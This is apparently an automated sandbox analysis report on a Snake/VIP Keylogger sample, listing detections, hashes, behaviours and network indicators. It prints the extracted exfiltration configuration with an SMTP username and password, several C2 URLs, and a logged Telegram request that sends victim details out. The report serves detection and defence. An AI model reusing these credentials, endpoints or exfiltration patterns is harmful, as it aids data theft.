Windows Analysis Report
NXPYoHNSgv.exe

Overview

General Information

Sample name: NXPYoHNSgv.exe (renamed because the original name is a hash value)
Original sample name: 5cce2f7bc1fd777f047c4b38e1112e49.exe
Analysis ID: 1528775
MD5: 5cce2f7bc1fd777f047c4b38e1112e49
SHA1: e3476ecbbd1826b6f1ccdabb5b49e638171557a0
SHA256: e82a67b020ca02403b8444cc5249ee827353082ee68a814a7c8053944e8b59b7
Tags: 32, exe, MassLogger, trojan

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "legacylog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: http://51.38.247.67:8081/_send_.php?L Virustotal: Detection: 7%
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 13%
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14%
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded Virustotal: Detection: 7%
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 17%
Source: NXPYoHNSgv.exe ReversingLabs: Detection: 60%
Source: NXPYoHNSgv.exe Virustotal: Detection: 39%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: NXPYoHNSgv.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: NXPYoHNSgv.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: NXPYoHNSgv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: jBGm.pdb source: NXPYoHNSgv.exe
Source: Binary string: jBGm.pdbSHA256 source: NXPYoHNSgv.exe
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0753833Ah 0_2_0753792C
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0321F8E9h 5_2_0321F631
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 0321FD41h 5_2_0321FA88
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC0D0Dh 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC1697h 5_2_06FC0B30
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DC8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC2C19h 5_2_06FC2968
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE959h 5_2_06FCE6B0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0673
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE501h 5_2_06FCE258
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCE0A9h 5_2_06FCDE00
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCF661h 5_2_06FCF3B8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCF209h 5_2_06FCEF60
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCEDB1h 5_2_06FCEB08
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCD3A1h 5_2_06FCD0F8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCCF49h 5_2_06FCCCA0
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0853
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 5_2_06FC0040
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCFAB9h 5_2_06FCF810
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DC2
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC2DBE
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCDC51h 5_2_06FCD9A8
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FCD7F9h 5_2_06FCD550
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 4x nop then jmp 06FC31E0h 5_2_06FC310E

Networking

Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.6:49827 -> 217.12.218.219:587
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:035347%0D%0ADate%20and%20Time:%2008/10/2024%20/%2017:20:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20035347%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 217.12.218.219 217.12.218.219
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49717 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49748 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49728 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49780 -> 188.114.96.3:443
Source: global traffic TCP traffic: 192.168.2.6:49827 -> 217.12.218.219:587
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:035347%0D%0ADate%20and%20Time:%2008/10/2024%20/%2017:20:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20035347%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.jhxkgroup.online
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 07:47:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crt0
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalc
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0Q
Source: NXPYoHNSgv.exe, 00000000.00000002.2153199131.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006B63000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4626980162.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: NXPYoHNSgv.exe, 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49786 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
